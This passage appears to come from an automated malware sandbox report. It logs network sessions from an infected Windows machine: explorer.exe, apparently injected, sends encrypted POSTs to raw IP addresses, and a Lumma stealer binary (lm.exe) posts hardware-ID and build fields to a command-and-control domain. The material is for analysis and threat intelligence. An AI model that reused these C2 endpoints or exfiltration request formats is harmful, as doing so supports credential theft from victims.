                                                                                    2024-07-24 17:57:19 UTC1369INData Raw: 53 76 31 4f 73 73 77 44 4c 45 78 41 47 52 79 68 4b 48 4d 48 7a 59 55 4b 30 46 39 78 41 66 45 52 46 50 49 52 52 31 57 4a 30 4b 77 65 54 64 34 58 36 65 66 63 58 4b 43 70 4c 4a 48 59 59 39 65 64 59 43 36 6b 44 2b 43 46 74 43 58 6d 6f 79 42 33 67 4b 68 45 44 51 70 39 66 67 4d 4d 55 35 6a 59 6c 43 6e 39 56 61 30 33 70 4e 30 68 37 34 53 76 63 5a 56 51 6c 4f 49 69 39 45 66 78 54 43 48 4a 69 67 31 50 38 31 78 7a 62 47 79 51 57 58 79 42 43 4c 4e 58 76 63 48 75 68 45 38 77 42 53 52 46 39 6d 50 77 31 2f 46 49 5a 44 6d 4f 71 61 36 69 61 47 5a 59 33 73 49 37 58 68 48 5a 46 36 59 4a 45 4a 6f 30 4c 38 53 41 63 4a 58 57 55 36 44 6e 4d 66 69 45 72 52 71 74 48 2f 4c 4d 55 35 7a 73 34 42 6e 38 51 55 69 7a 31 36 30 52 66 69 54 76 51 43 58 45 38 52 49 6e 59 44 59 46 6a 61 42
                                                                                    Data Ascii: Sv1OsswDLExAGRyhKHMHzYUK0F9xAfERFPIRR1WJ0KweTd4X6efcXKCpLJHYY9edYC6kD+CFtCXmoyB3gKhEDQp9fgMMU5jYlCn9Va03pN0h74SvcZVQlOIi9EfxTCHJig1P81xzbGyQWXyBCLNXvcHuhE8wBSRF9mPw1/FIZDmOqa6iaGZY3sI7XhHZF6YJEJo0L8SAcJXWU6DnMfiErRqtH/LMU5zs4Bn8QUiz160RfiTvQCXE8RInYDYFjaB
                                                                                    2024-07-24 17:57:19 UTC1369INData Raw: 72 50 63 30 34 78 38 59 46 6b 4d 41 49 69 44 56 77 32 78 44 73 51 2f 59 4a 55 45 39 57 5a 54 63 4d 66 31 6a 4d 42 4e 2b 38 6d 72 56 2b 36 44 72 4f 77 30 4b 48 67 77 50 4c 50 58 4f 66 53 4b 4e 46 2b 67 4a 56 52 31 46 72 4a 41 4a 78 47 49 46 57 32 36 4c 53 36 7a 4c 4b 4d 4d 58 4f 41 70 33 47 46 34 41 33 65 64 38 62 34 67 57 2b 53 46 68 52 45 54 52 32 4e 58 55 57 68 6b 72 62 74 4e 32 74 49 59 67 6b 6a 63 41 4f 32 4a 56 61 68 44 4e 74 32 42 58 72 54 50 41 47 56 6b 42 57 61 44 55 46 66 42 53 4e 54 64 75 73 32 2b 55 78 78 54 33 47 7a 77 69 5a 77 78 2f 4c 64 44 2f 59 43 4b 4d 64 73 43 64 63 54 46 70 74 64 43 4e 2b 48 34 34 45 78 2b 72 44 72 54 6e 4b 66 5a 57 48 41 5a 7a 44 45 34 51 2b 64 64 67 51 35 45 50 77 41 46 52 45 57 6e 34 7a 43 6e 30 5a 67 6b 58 58 71 4e
                                                                                    Data Ascii: rPc04x8YFkMAIiDVw2xDsQ/YJUE9WZTcMf1jMBN+8mrV+6DrOw0KHgwPLPXOfSKNF+gJVR1FrJAJxGIFW26LS6zLKMMXOAp3GF4A3ed8b4gW+SFhRETR2NXUWhkrbtN2tIYgkjcAO2JVahDNt2BXrTPAGVkBWaDUFfBSNTdus2+UxxT3GzwiZwx/LdD/YCKMdsCdcTFptdCN+H44Ex+rDrTnKfZWHAZzDE4Q+ddgQ5EPwAFREWn4zCn0ZgkXXqN
                                                                                    2024-07-24 17:57:19 UTC180INData Raw: 4b 38 36 41 50 4b 62 6a 48 59 30 2f 65 4d 39 53 7a 55 37 6b 44 78 38 48 45 57 4e 32 58 45 46 59 79 67 54 6e 36 70 72 31 66 70 35 39 2b 4d 51 4d 6c 73 6f 4d 6d 6e 64 52 32 42 62 6d 51 75 42 4b 63 55 4a 46 61 33 5a 4b 4f 42 37 43 48 49 6a 71 6d 75 6b 76 68 6d 57 64 6c 56 6e 4e 6e 6b 33 62 61 47 43 52 43 61 4e 54 73 46 41 4e 42 78 46 2b 64 6c 77 34 58 34 46 57 79 71 4c 5a 2b 7a 32 42 41 2f 50 45 46 4a 58 43 45 59 6f 45 51 66 45 64 34 6b 62 2b 53 6d 35 66 58 48 77 31 41 58 38 6d 76 45 72 66 73 4e 33 6a 4f 4d 5a 39 67 34 63 4e 32 4a 0d 0a
                                                                                    Data Ascii: K86APKbjHY0/eM9SzU7kDx8HEWN2XEFYygTn6pr1fp59+MQMlsoMmndR2BbmQuBKcUJFa3ZKOB7CHIjqmukvhmWdlVnNnk3baGCRCaNTsFANBxF+dlw4X4FWyqLZ+z2BA/PEFJXCEYoEQfEd4kb+Sm5fXHw1AX8mvErfsN3jOMZ9g4cN2J
                                                                                    2024-07-24 17:57:19 UTC1369INData Raw: 32 34 38 36 0d 0a 55 6a 79 33 49 2f 34 46 36 6a 58 62 42 51 48 33 78 53 59 6a 67 44 62 67 6e 50 5a 38 36 70 31 65 59 2f 68 6e 4f 4e 77 55 4c 41 6e 56 54 4c 50 6d 36 66 53 4c 4d 58 71 31 30 4d 48 67 45 2b 4b 55 70 68 57 4a 51 45 67 50 61 55 72 53 79 47 5a 59 32 41 44 4a 58 4d 47 59 55 35 62 63 30 57 34 46 50 7a 54 32 46 33 63 47 45 39 43 48 55 58 69 58 72 6d 68 64 66 6d 4d 73 73 79 78 76 6b 38 6a 63 34 55 68 54 31 70 7a 6c 43 74 42 66 39 49 42 33 41 52 4a 48 59 37 4e 6c 69 61 42 49 44 6b 37 2b 34 77 79 44 72 62 31 6b 2b 35 77 42 47 48 4e 33 44 55 55 4b 30 46 39 6b 67 48 47 52 38 73 4d 68 55 34 51 4e 49 57 67 2f 47 4a 75 6d 36 55 49 6f 50 65 51 6f 36 4e 51 74 6c 30 50 38 31 51 75 77 57 33 43 30 31 62 56 32 38 67 42 7a 38 6d 76 47 66 50 73 74 44 32 66 4f 41
                                                                                    Data Ascii: 2486Ujy3I/4F6jXbBQH3xSYjgDbgnPZ86p1eY/hnONwULAnVTLPm6fSLMXq10MHgE+KUphWJQEgPaUrSyGZY2ADJXMGYU5bc0W4FPzT2F3cGE9CHUXiXrmhdfmMssyxvk8jc4UhT1pzlCtBf9IB3ARJHY7NliaBIDk7+4wyDrb1k+5wBGHN3DUUK0F9kgHGR8sMhU4QNIWg/GJum6UIoPeQo6NQtl0P81QuwW3C01bV28gBz8mvGfPstD2fOA
                                                                                    2024-07-24 17:57:19 UTC1369INData Raw: 70 37 4f 57 73 56 36 65 5a 39 49 73 77 75 77 44 45 34 4a 43 54 78 6b 58 79 31 4c 31 52 53 4b 75 35 54 30 66 74 42 39 6c 5a 56 4d 32 4e 39 61 30 33 6f 34 33 41 4c 78 51 2f 4d 65 58 41 35 76 55 68 41 48 61 52 4b 6a 53 63 69 6a 35 4e 4d 72 78 54 50 44 77 42 53 4a 6a 56 54 4c 4e 54 2b 48 4b 61 4d 4e 76 41 35 63 58 78 46 54 65 45 52 67 57 4e 6f 45 37 61 66 55 34 7a 6e 51 4c 49 44 68 41 59 6e 48 4f 34 59 71 65 4a 39 65 6f 30 4f 77 55 41 77 48 45 57 67 6e 52 43 42 49 30 42 2b 4e 39 34 32 39 62 4e 6c 7a 31 49 63 55 32 4a 56 49 78 58 70 74 6e 30 69 6a 41 76 4d 61 54 55 39 53 65 6a 56 44 52 69 61 33 52 39 61 71 33 66 73 4c 78 53 7a 4f 78 77 6d 6d 38 7a 75 46 4d 58 6a 54 42 74 31 37 78 51 74 52 52 31 5a 36 4a 30 51 32 57 49 30 45 67 4a 32 61 70 58 37 35 63 34 33 66
                                                                                    Data Ascii: p7OWsV6eZ9IswuwDE4JCTxkXy1L1RSKu5T0ftB9lZVM2N9a03o43ALxQ/MeXA5vUhAHaRKjScij5NMrxTPDwBSJjVTLNT+HKaMNvA5cXxFTeERgWNoE7afU4znQLIDhAYnHO4YqeJ9eo0OwUAwHEWgnRCBI0B+N9429bNlz1IcU2JVIxXptn0ijAvMaTU9SejVDRia3R9aq3fsLxSzOxwmm8zuFMXjTBt17xQtRR1Z6J0Q2WI0EgJ2apX75c43f


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    37192.168.2.1049783107.173.160.1374433968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-07-24 17:57:20 UTC234OUTPOST / HTTP/1.1
                                                                                    Host: 107.173.160.137
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Connection: close
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 1122
                                                                                    2024-07-24 17:57:20 UTC1122OUTData Raw: 6f 32 46 76 71 70 63 6f 31 42 46 74 79 77 64 44 4f 5a 33 79 55 4b 51 4e 4f 39 43 7a 36 52 5a 34 39 76 34 55 2f 2b 44 7a 76 53 4f 74 6a 59 37 75 35 64 78 74 44 41 49 66 2f 6d 65 45 44 67 71 58 39 2b 31 65 50 34 57 31 67 4f 39 66 4c 59 63 6a 47 76 66 67 34 68 74 57 5a 31 6b 52 6f 46 4a 36 6c 6b 33 50 72 70 6e 39 44 6b 51 65 46 69 33 45 61 4e 2f 79 4c 75 55 49 6e 62 6b 4b 30 4c 70 56 47 70 4f 4e 44 49 79 57 37 73 66 74 4a 6a 45 6a 7a 77 67 53 64 79 4e 71 68 7a 4c 56 4a 67 44 74 69 46 5a 70 79 41 38 63 70 77 58 73 6d 55 62 35 4c 55 52 70 59 6d 47 49 36 6b 4f 6e 75 5a 38 59 58 65 55 57 72 4d 31 63 6c 7a 77 4c 2b 73 4d 44 6d 37 75 72 6e 4c 75 4a 57 76 6e 4a 72 74 6a 75 42 4a 44 4b 43 68 34 63 6d 6d 53 6d 53 70 68 50 7a 66 31 34 37 32 75 32 4d 53 61 39 57 51 6d
                                                                                    Data Ascii: o2Fvqpco1BFtywdDOZ3yUKQNO9Cz6RZ49v4U/+DzvSOtjY7u5dxtDAIf/meEDgqX9+1eP4W1gO9fLYcjGvfg4htWZ1kRoFJ6lk3Prpn9DkQeFi3EaN/yLuUInbkK0LpVGpONDIyW7sftJjEjzwgSdyNqhzLVJgDtiFZpyA8cpwXsmUb5LURpYmGI6kOnuZ8YXeUWrM1clzwL+sMDm7urnLuJWvnJrtjuBJDKCh4cmmSmSphPzf1472u2MSa9WQm
                                                                                    2024-07-24 17:57:21 UTC137INHTTP/1.1 200 OK
                                                                                    Content-Length: 685
                                                                                    Date: Wed, 24 Jul 2024 17:57:21 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    2024-07-24 17:57:21 UTC685INData Raw: 4f 61 6a 58 76 4f 57 4a 79 4b 6e 57 65 35 44 62 44 37 31 4f 46 75 6b 64 49 31 36 4c 38 59 47 65 47 7a 68 63 59 50 49 43 79 72 47 54 37 76 34 4f 39 6a 59 4f 44 68 6d 57 5a 6d 47 61 5a 51 42 30 68 4c 64 65 77 75 55 65 6b 6a 4a 76 5a 37 78 58 74 34 38 30 69 76 4c 50 71 4b 71 47 36 35 34 79 4c 73 6e 39 44 71 46 33 74 66 72 66 35 4f 67 7a 34 44 72 55 67 53 76 54 54 62 65 38 33 4d 61 6f 37 6d 71 7a 59 4e 4c 30 49 73 45 35 53 4e 72 48 69 78 74 48 63 75 42 59 44 62 4d 67 49 6b 46 41 72 4d 30 44 71 5a 31 41 76 6c 6c 62 55 66 64 41 64 69 62 4e 32 66 70 72 64 33 30 73 30 44 53 38 51 45 63 62 51 62 57 6b 4b 64 6d 55 49 6d 66 53 79 55 38 34 35 6b 32 77 6a 65 51 71 4e 73 69 62 73 64 42 64 77 6c 4e 45 62 4f 31 34 64 37 68 45 63 42 4c 4a 73 2b 4f 72 34 33 4b 56 42 77 69
                                                                                    Data Ascii: OajXvOWJyKnWe5DbD71OFukdI16L8YGeGzhcYPICyrGT7v4O9jYODhmWZmGaZQB0hLdewuUekjJvZ7xXt480ivLPqKqG654yLsn9DqF3tfrf5Ogz4DrUgSvTTbe83Mao7mqzYNL0IsE5SNrHixtHcuBYDbMgIkFArM0DqZ1AvllbUfdAdibN2fprd30s0DS8QEcbQbWkKdmUImfSyU845k2wjeQqNsibsdBdwlNEbO14d7hEcBLJs+Or43KVBwi


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    38192.168.2.1049785172.67.213.854437864C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-07-24 17:57:22 UTC287OUTPOST /api HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Content-Length: 12842
                                                                                    Host: liernessfornicsa.shop
                                                                                    2024-07-24 17:57:22 UTC12842OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 46 32 43 31 31 34 37 36 39 45 35 39 41 33 36 30 44 33 46 41 41 41 31 42 35 30 38 44 46 37 38 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 71 54 6f 59 72 4a 2d 2d 0d 0a 2d 2d 62
                                                                                    Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"8F2C114769E59A360D3FAAA1B508DF78--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"qToYrJ----b
                                                                                    2024-07-24 17:57:22 UTC808INHTTP/1.1 200 OK
                                                                                    Date: Wed, 24 Jul 2024 17:57:22 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Set-Cookie: PHPSESSID=rldqu6ob8i9egpl365l1sc4862; expires=Sun, 17-Nov-2024 11:44:01 GMT; Max-Age=9999999; path=/
                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BoSS27OJoNGnAFA8FEy3%2FQccasKYuufmzvESVxzYEmM6BqFFaVkoZEpmtEPmrd5j%2FJhNaSd2BeKb1jOaByyFnRAWjc21DRv4weow%2Bca9SV7cjYzEdIfv%2BPTnTABfbSePjkhfSjiymuA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8a85cacd6ed142ab-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-07-24 17:57:22 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
                                                                                    Data Ascii: eok 8.46.123.33
                                                                                    2024-07-24 17:57:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    39192.168.2.1049786107.173.160.1394433968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-07-24 17:57:22 UTC234OUTPOST / HTTP/1.1
                                                                                    Host: 107.173.160.139
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Connection: close
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 1122
                                                                                    2024-07-24 17:57:22 UTC1122OUTData Raw: 45 7a 58 39 4d 4b 45 6c 55 47 39 49 78 53 34 63 67 39 68 53 6c 61 5a 71 6e 6f 71 46 68 58 49 66 45 79 69 42 35 6e 36 69 6f 2f 4f 70 31 34 57 45 57 73 63 5a 56 53 37 32 39 42 54 64 36 56 56 68 6e 55 45 57 4b 61 4e 4c 6d 6d 65 75 38 42 36 56 4b 77 35 4c 68 35 32 73 6c 32 73 54 45 46 36 43 49 79 30 43 61 73 75 77 32 76 53 77 68 70 55 34 45 76 56 63 4b 70 38 65 39 4e 69 79 76 5a 51 38 4f 4b 6a 37 2f 67 72 70 2b 41 57 54 65 30 76 5a 33 41 31 75 72 42 68 30 55 64 56 37 72 6e 50 6b 4f 78 30 72 53 6d 68 75 58 58 79 79 2f 32 42 2b 37 42 76 48 4b 43 32 47 56 53 39 30 66 4d 35 66 34 2b 39 77 41 58 4a 37 31 4c 57 52 68 2f 41 57 77 74 50 4e 6b 6b 74 4b 62 51 6f 6a 6c 69 42 64 53 36 52 68 52 44 61 6a 6d 6e 4f 55 56 59 67 57 44 70 68 35 4c 52 70 73 78 43 78 6b 52 51 79
                                                                                    Data Ascii: EzX9MKElUG9IxS4cg9hSlaZqnoqFhXIfEyiB5n6io/Op14WEWscZVS729BTd6VVhnUEWKaNLmmeu8B6VKw5Lh52sl2sTEF6CIy0Casuw2vSwhpU4EvVcKp8e9NiyvZQ8OKj7/grp+AWTe0vZ3A1urBh0UdV7rnPkOx0rSmhuXXyy/2B+7BvHKC2GVS90fM5f4+9wAXJ71LWRh/AWwtPNkktKbQojliBdS6RhRDajmnOUVYgWDph5LRpsxCxkRQy
                                                                                    2024-07-24 17:57:23 UTC137INHTTP/1.1 200 OK
                                                                                    Content-Length: 685
                                                                                    Date: Wed, 24 Jul 2024 17:57:23 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    2024-07-24 17:57:23 UTC685INData Raw: 45 49 58 48 77 7a 48 6c 68 68 43 49 56 6b 54 78 68 53 34 77 2f 59 44 4b 75 30 62 39 74 45 73 4b 6c 2f 47 65 76 2b 6d 67 58 5a 4a 69 76 68 56 53 4b 74 6f 61 54 74 69 71 72 44 70 56 77 5a 45 4b 72 58 46 6f 6e 56 6a 57 6b 2b 49 4b 6e 63 78 44 33 31 46 34 75 61 55 67 62 74 6a 71 70 43 49 54 55 42 77 32 51 74 48 72 31 74 77 66 49 6d 57 35 6a 4c 73 47 44 62 4e 78 43 63 58 2f 56 58 67 65 33 69 6f 39 6c 7a 43 67 45 45 2f 4b 71 73 43 38 76 45 2b 55 50 38 65 4c 61 56 43 6d 48 4f 32 71 4f 6c 48 32 2b 46 4e 6b 34 76 65 6d 62 34 58 47 32 4e 6e 2b 6b 4d 36 43 31 30 2b 77 4e 6e 56 66 65 6f 43 5a 48 4c 46 55 59 71 72 79 61 61 44 49 6d 74 56 6a 6e 44 41 70 5a 41 58 33 54 4c 55 42 57 2b 41 53 64 76 4f 32 7a 74 34 59 55 4a 58 30 61 36 79 70 37 7a 37 59 79 58 32 62 46 71 77
                                                                                    Data Ascii: EIXHwzHlhhCIVkTxhS4w/YDKu0b9tEsKl/Gev+mgXZJivhVSKtoaTtiqrDpVwZEKrXFonVjWk+IKncxD31F4uaUgbtjqpCITUBw2QtHr1twfImW5jLsGDbNxCcX/VXge3io9lzCgEE/KqsC8vE+UP8eLaVCmHO2qOlH2+FNk4vemb4XG2Nn+kM6C10+wNnVfeoCZHLFUYqryaaDImtVjnDApZAX3TLUBW+ASdvO2zt4YUJX0a6yp7z7YyX2bFqw


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    40192.168.2.1049787172.67.213.854437864C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-07-24 17:57:24 UTC287OUTPOST /api HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Content-Length: 15069
                                                                                    Host: liernessfornicsa.shop
                                                                                    2024-07-24 17:57:24 UTC15069OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 46 32 43 31 31 34 37 36 39 45 35 39 41 33 36 30 44 33 46 41 41 41 31 42 35 30 38 44 46 37 38 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 71 54 6f 59 72 4a 2d 2d 0d 0a 2d 2d 62
                                                                                    Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"8F2C114769E59A360D3FAAA1B508DF78--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"qToYrJ----b
                                                                                    2024-07-24 17:57:24 UTC806INHTTP/1.1 200 OK
                                                                                    Date: Wed, 24 Jul 2024 17:57:24 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Set-Cookie: PHPSESSID=asihppcspti2mu2itsls1866jc; expires=Sun, 17-Nov-2024 11:44:03 GMT; Max-Age=9999999; path=/
                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WKbnzXbZ5k7tJu8i8CNpNgpVqnL2h1VqBvxQHzRaiXfEZaYbPndsvMe55bZlXp7ngGJBohBhU%2BuJF0zifinFFolib0Bq3jGRniKLhfz3jyO1cdEWt4miajJhBYPI%2FGMq%2BcWZHJbISCc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8a85cad9ac267288-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-07-24 17:57:24 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
                                                                                    Data Ascii: eok 8.46.123.33
                                                                                    2024-07-24 17:57:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    41192.168.2.1049788167.235.128.1534433968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-07-24 17:57:24 UTC234OUTPOST / HTTP/1.1
                                                                                    Host: 167.235.128.153
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Connection: close
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 1122
                                                                                    2024-07-24 17:57:24 UTC1122OUTData Raw: 4e 57 72 41 4b 34 7a 42 52 43 4d 66 4e 31 62 43 50 71 71 71 55 32 2b 69 7a 70 78 58 79 70 73 36 42 75 38 57 38 4a 77 32 39 4a 45 54 53 64 36 76 31 4f 55 68 5a 2b 65 70 6e 2f 4c 4d 72 41 51 57 47 6c 79 67 33 4a 76 52 48 38 4e 77 39 74 49 63 72 59 74 4d 4a 42 2f 72 7a 4b 37 6d 64 4f 58 33 5a 77 69 4a 35 78 66 66 39 67 64 31 2f 54 2f 42 41 57 75 34 6f 68 4d 64 56 65 61 6d 7a 32 4a 43 68 43 45 77 56 4a 6b 76 77 30 58 55 55 4e 64 53 64 42 49 4d 69 6e 41 4e 4c 66 45 4b 34 6d 53 47 6b 56 71 48 4e 66 34 62 2f 50 67 65 4f 57 66 4d 57 36 61 6e 72 66 41 39 64 56 4c 45 46 65 50 67 48 67 6f 77 56 38 58 46 62 72 46 42 47 59 58 45 32 47 47 46 78 78 6d 36 6f 49 58 65 6b 4e 4a 31 71 36 4a 73 59 39 4a 58 30 5a 75 4a 58 7a 4a 69 5a 7a 57 41 30 42 75 34 30 33 69 31 30 54 6a
                                                                                    Data Ascii: NWrAK4zBRCMfN1bCPqqqU2+izpxXyps6Bu8W8Jw29JETSd6v1OUhZ+epn/LMrAQWGlyg3JvRH8Nw9tIcrYtMJB/rzK7mdOX3ZwiJ5xff9gd1/T/BAWu4ohMdVeamz2JChCEwVJkvw0XUUNdSdBIMinANLfEK4mSGkVqHNf4b/PgeOWfMW6anrfA9dVLEFePgHgowV8XFbrFBGYXE2GGFxxm6oIXekNJ1q6JsY9JX0ZuJXzJiZzWA0Bu403i10Tj
                                                                                    2024-07-24 17:57:25 UTC137INHTTP/1.1 200 OK
                                                                                    Content-Length: 685
                                                                                    Date: Wed, 24 Jul 2024 17:57:25 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    2024-07-24 17:57:25 UTC685INData Raw: 42 56 74 66 4c 6c 66 67 6d 32 62 4f 76 50 4a 6f 43 75 4c 55 2b 31 66 4d 4e 4b 41 6b 4d 4a 6d 35 48 31 56 66 74 68 69 49 53 36 78 52 30 34 64 68 61 75 4a 33 64 55 2b 4a 7a 75 4d 79 4a 4e 78 4a 4e 67 76 35 56 66 6b 6d 46 71 7a 5a 63 43 34 52 70 6d 30 67 52 77 78 70 6b 6d 50 6b 30 75 77 74 75 76 41 56 47 36 49 54 75 6d 67 70 78 49 31 39 39 34 6a 6d 70 72 51 61 42 42 57 69 76 77 62 2b 52 34 38 6d 53 4b 78 4d 52 39 31 4b 59 63 78 32 50 47 55 6b 56 33 44 6c 52 2f 46 6d 49 70 4d 4f 73 4d 38 6b 74 73 71 31 38 58 4d 35 46 62 2f 7a 75 54 43 50 4f 71 38 69 6a 50 51 6c 51 58 38 67 41 42 4e 75 34 71 37 6c 64 2f 68 2f 64 45 51 46 39 44 72 4c 59 4b 79 31 45 4e 36 2f 75 53 63 42 70 36 74 74 56 68 2f 71 67 65 43 69 55 52 41 33 56 48 6f 52 72 44 34 53 46 6a 74 33 76 6c 50
                                                                                    Data Ascii: BVtfLlfgm2bOvPJoCuLU+1fMNKAkMJm5H1VfthiIS6xR04dhauJ3dU+JzuMyJNxJNgv5VfkmFqzZcC4Rpm0gRwxpkmPk0uwtuvAVG6ITumgpxI1994jmprQaBBWivwb+R48mSKxMR91KYcx2PGUkV3DlR/FmIpMOsM8ktsq18XM5Fb/zuTCPOq8ijPQlQX8gABNu4q7ld/h/dEQF9DrLYKy1EN6/uScBp6ttVh/qgeCiURA3VHoRrD4SFjt3vlP


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    42192.168.2.1049789107.173.160.1374433968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-07-24 17:57:26 UTC234OUTPOST / HTTP/1.1
                                                                                    Host: 107.173.160.137
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Connection: close
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 1267
